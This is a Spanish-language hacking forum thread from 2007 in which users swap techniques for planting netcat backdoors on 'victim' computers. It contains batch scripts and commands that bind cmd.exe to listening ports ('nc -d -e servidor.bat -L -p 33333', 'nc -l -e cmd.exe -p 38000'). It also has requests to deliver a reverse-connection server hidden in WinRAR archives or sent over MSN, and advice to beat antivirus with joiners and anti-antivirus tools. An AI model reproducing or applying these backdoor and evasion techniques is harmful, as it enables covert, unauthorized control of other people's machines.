Jugando con netcat

vatox100pre · 31 Octubre 2007, 17:20 PM

Hola hermano weno la conexion me salio exitosa xevere pero hay un problema en la maquina victima me queda una ventana de DOS sin ningun parametro solo una ventana negra naa mas, weno mientras esa ventanita esta activa puedo desde mi maquina controlarla y a la vez navegar por todo sus unidades pero cuando cierro la ventanita de DOS en la maquina remota ps ya no me deja hacer nada pero la maquina sigue conectada a mi pc a que se debe??? desde ya mis saludos para toda la comunidad.

Zykl0n-B · 31 Octubre 2007, 23:02 PM

¡Venga! ¿Una ventana negra sin parámetros?
La única forma de que a tu víctima le aparezca una ventana negra es que no estés indicándole a Netcat el modo "Detach" ó "Separado", revisa bien ese código..
Saludos.

vatox100pre · 31 Octubre 2007, 23:35 PM

Hola men weno si te refieres a esto -d ps creo que la configuracion que me da WHK esta bien los parametros -d estan antes de la IP que mas puede ser???

Zykl0n-B · 5 Noviembre 2007, 11:49 AM

¡Venga! no había leído tus Posts de "Jugando con Netcat" detenidamente...
En el número 3 dices "Poner contraseñas" Pero sólo haces que verifique las IP's.. Esas no son contraseñas, aquí les dejo un Batch que pide Usuario y Password, y si no escriben el correcto, Pa' fuera van xD

Funciona parecido al del manual de WHK, 2 archivos, aquí les dejo el código:

Servidor.bat

Citar@echo off
Echo \\\\\\\\\\\\\\\\ZONA PROTEGIDA/////////////////
Echo Estas conectandote con el servidor de Zykl0n-B
Echo Por favor, Identificate.
Echo Nombre de Usuario:
set/p user1=
if %user1%==Zykl0n (goto gooduser) else goto baduser
:gooduser
Echo.
Echo El usuario %user1% es correcto,
Echo ahora introduce tu Password:
set/p pass1=
if %pass1%==mypassword (goto goodpass) else goto badpass
:baduser
Echo Tu nombre de usuario es Incorrecto
pause
exit
:goodpass
@Cls
Echo Bienvenido %user1%! && cmd.exe
Echo La Conexion ha terminado.
pause
exit
:badpass
Echo Password incorrecto
pause
exit

Ese vendrá siendo el Servidor, ahora el archivo que hace correr a Netcat y que hace correr el Server:

Run Server.bat

Citar@Echo off
start nc -d -e servidor.bat -L -p 33333

Venga, Gracias a WHK por haber publicado esos manuales, no habría pensado en "Netcat con Passwords" :p , venga, espero que les sirva.
Saludos

D4RIO · 6 Noviembre 2007, 04:50 AM

Hey, si querés seguridad te conviene pasar la parte de comprobar password a un ejecutable para que no se pueda ver el fuente...a parte podés dejar el proceso corriendo, hacerlo persistente, usar md5...lo que quieras...Lo podés hacer en C++, o bien en C.

Lo que quería era hacer una pequeña colaboración:: Podemos entablar un chat con un equipo que no tenga netcat así::

En nuestro equipo ponemos "nc -vv -l -p 5000" (por ejemplo)... y en el otro vamos vía telnet poniendo "telnet nuestra_ip_o_dns" o sea que puede ser, en mi caso, "telnet darioweb.noip.org"... así podemos chatear via consola con amigos que no tengan netcat...y también podemos mantener una parte de nuestro "paquete" invisible a los antivirus mientras nos informamos acerca de la ip y otros datos que nos interesen para hacer un nuevo intento más adelante . . .

OTRO:
Podemos no desear que nuestra ip o dns esté grabado en la máquina del otro...en ese caso le dejamos un nc.exe pero lo ponemos a la escucha (en algún puerto bien raro, que puede ser elegido al azar, y descubierto con un escaneo de puertos)...
El nc a la escucha también puede ejecutar un comando al recibir conexión, con lo que:::.

nc -l -e cmd.exe -p 38000

sería un ejemplo...y nosotros conectaríamos simplemente con ejecutar "nc host_rmoto 38000"...(y añadir -vv si hay problemas)

Buen truco no?? el tema es que cualquiera puede conectarse a la máquina con sólo hacer un rápido escaneo de puertos...y en poco tiempo llega a escanear un montón:::..

hacklam · 6 Noviembre 2007, 23:32 PM

Muy buenas respuestas y un buen foro que creo q tiene futuro.

Seguir así

asturkillers.mundoforo.com

carlipus · 8 Noviembre 2007, 15:36 PM

Una vez hago el server de netcat con conexión inversa...se la mando a mi victima metido en el winrar, pero... su antivirus lo elimina...y por tanto no puedo tener acceso!

Alguna idea?

Crazy.sx · 8 Noviembre 2007, 16:19 PM

Acá dejo un code en batch que hice. Un útil manual que posteé. Posible solucion Antivirus (mayoría).

link del post : http://foro.elhacker.net/index.php/topic,186544.0.html

Saludos a la comunidad

carlipus · 8 Noviembre 2007, 16:55 PM

pero no me queda claro, haciendo todo eso de ese post, a la victima le aparece que es un virus, no se si se podrá hacer indetectable este servidor de netcat xq algunos av lo detectan

Y para mandarselo por msn el server, hay que meterle en winrar o winzip, no se puede de otra forma no?

D4RIO · 8 Noviembre 2007, 22:47 PM

Amigos, ahi es donde entra en juego su creatividad como hackers . . . si el antivirus te molesta, encontrale la vuelta y burlalo...apagalo, detenelo, engañalo, rebuscatelas para cambiar el server y hacerlo indetectable...usá joiners, utilidades anti-antivirus:::. No se crean que los hackers tienen algun secreto como "apagar-antivirus" y listo... hay que leer, informarse .. y usar la materia griss (y la materia google)

(A parte eso ya se hablo)